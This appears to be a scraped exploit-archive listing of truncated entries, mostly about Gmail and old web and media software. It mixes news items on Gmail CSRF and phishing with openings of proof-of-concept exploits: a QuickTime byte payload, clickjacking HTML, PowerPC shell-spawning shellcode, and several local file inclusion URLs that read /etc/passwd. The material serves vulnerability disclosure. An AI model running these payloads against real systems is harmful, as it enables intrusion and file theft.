Apple QuickTime - Image Description Atom Sign Extension (PoC)

print " -----------BID 35166----------" print " w3bd3vil at gmail dot com" print "Apple QuickTime Image Description Atom Sign Extension Vulnerability PoC" print " -----------BID 35166----------" bytes = 0x00, 0x00, 0x00, 0x08, 0x77, 0x69, 0x64, 0x65, 0x00, 0x02, 0xD6, 0x48, 0x6D, 0x64, 0x61, 0x74...

Arcadwy Games CMS SQL Injection

--------------------------------------------------------------------------------------------- scriptname: Arcadwy Games Cms Arcadwy Games Cms Auth Bypass SQL Injection Vulnerability Author: PLATEN contact: PLATEN.SecureatGmail.com web: Www.ata-turk.tk & www.deltahacking.net big tnx: b3hz4d...

Gmail flaw exposes 'change password' feature

Dark Reading has the skinny on a new Gmail vulnerability that lets an attacker change a Gmail user’s password, wage a denial-of-service attack on the account, or even access other Gmail users’ email. From the article: The cross-site request forgery CSRF flaw — which researcher Vicente Aguilera Di...

Phishing attack hits Gmail chat

Gmail users have had a rough time of it this week. Just a few hours after the hugely popular webmail service cratered on Tuesday morning, the instant-messaging feature associated with the site became the target of a phishing attack. The New York Times Bits blog has a post explaining the mechanics...

GMail, GTalk phishing scam underway

Attention GMail and GTalk users: There’s a major spam run underway with social engineering lures to steal your login cretentials. This image shows a GMail message that purports to be an account termination warning from Google but, if a user is tricked into clicking on the link, he/she is redirect...

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking

No description provided by source. Firefox 3.0.5 Status Bar Obfuscation / Clickjacking =========================================== html body div id="mydiv" onmouseover="document.location='http://www.milw0rm.com';" style="position:absolute;width:2px;height:2px;background:FFFFFF;border:0px"/div...

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking =========================================== function updateboxevt mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById'mydiv'.style.left=mouseX-1;...

The use of the hamster hijacking Gmail(sidejacking)-vulnerability warning-the black bar safety net

4 month released, the software DESCRIPTION is tempting: "The black hat of the General Assembly after the outgoing of a tool to Ferret it. The author claims that you can use him to intercept mail login process the cookie information. Then you can feel free to invade the others mailbox. Worked at t...

OSX/PPC - execve(/bin/sh,[/bin/sh],NULL) + exit() Shellcode (72 bytes)

OSX/PPC - execve/bin/sh,/bin/sh,NULL + exit Shellcode 72 bytes. Shellcode exploit for OSXPPC platform / MacOSX/PowerPC Shellcode for: execve"/bin/sh", "/bin/sh", NULL, exit 72 bytes hophet at gmail.com http://www.nlabs.com.br/hophet/ / include "stdio.h" include "string.h" char shellcode =...

Pre Job Board Database Disclosure

--------------------------------------------------------- Portal Name: Pre Job Board Vendor : http://www.preproject.com/preaspjobboard.asp Author : PouyaServer , [email protected] Vulnerability : DD --------------------------------------------------------- DD: http://site.com/Path/db/pre.mdb...

HarlandScripts drinks (recid) Remote SQL Injection Velnerability

No description provided by source. =========================================== Drinks script. -------------------------------------------------------------------------------------- Vendor: http://www.fivedollarscripts.com Demo: http://www.fivedollarscripts.com/drinks/index.php Notified: No...

Using MS08-0 5 8 attack Google-bug warning-the black bar safety net

From: 80sec Vulnerability description:Google is the largest search engine. While Google owns the other large WEB application product line, to EMAIL, BLOG, online documents, personal home pages, electronic maps, discussion forums, RSS, etc. the Internet almost all of the application services. 80se...

adv93-K-159-2008.txt

ECHOADV93$2008 ----------------------------------------------------------------------------------------- ECHOADV93$2008 Kmita Tellfriend = 2.0 file Remote File Inclusion Vulnerability ----------------------------------------------------------------------------------------- Author : M.Hasran...

travelsized-lfi.txt

travelsized cms 0.4.1 multiple local file inclusion vulnerabilities download http://sourceforge.net/projects/uberghey/ author muuratsalo contact muuratsaloatgmail.com exploits http://localhost/travelsized-0.4.1/index.php?pageid=../../../../../../../../../../etc/passwd%00...

plutostatus-lfi.txt

PlutoStatus Locator v1.0pre alpha local file inclusion vulnerability download http://sourceforge.net/projects/plutostatus/ author muuratsalo contact muuratsaloatgmail.com exploit http://localhost/locator/index.php?page=../../../../../../../../../../etc/passwd%00...

Scribe 0.2 - index.php Local File Inclusion

Scribe 0.2 - index.php Local File Inclusion scribe 0.2 local file inclusion vulnerability download http://sourceforge.net/projects/scribe/ author muuratsalo contact muuratsaloatgmail.com exploit http://localhost/0.2/index.php?page=../../../../../../../../../../etc/passwd%00 milw0rm.com 2008-02-14...

jetAudio <= 7.0.5 (.ASX) Remote Stack Overflow

Application: jetAudio 7.0.5 .ASX Remote Stack Overflow Web Site: http://www.cowonamerica.com/download/ Platform: Windows Bug:Remote Stack Overflow Extension: ASX special condition: none ------------------------------------------------------- 1 Introduction 2 Bug 3 Proof of concept 4 Credits...

xeCMS 1.x - view.php Remote File Disclosure

xeCMS 1.x - view.php Remote File Disclosure -------------------------------------------------------------- xeCMS 1.x.x Remote File Disclosure Vulnerability. -------------------------------------------------------------- download : http://xecms.sunsite.dk/ author : p4imi0 contact : [email protected]...

GMail Mobile DoS

DoS on large message recevied during composing the message...

[Full-disclosure] Gmail 1.1.0 for BlackBerry remote DoS

I have tested and confirmed this bug on a BlackBerry 8700c in a repeatable fashion. Three outcomes are common so may be race condition... 1 Entire BlackBerry OS freeze. On soft-reboot, you will see the uncaught Java exception for Gmail app 2 Gmail freezes for some time, and then OS can recover...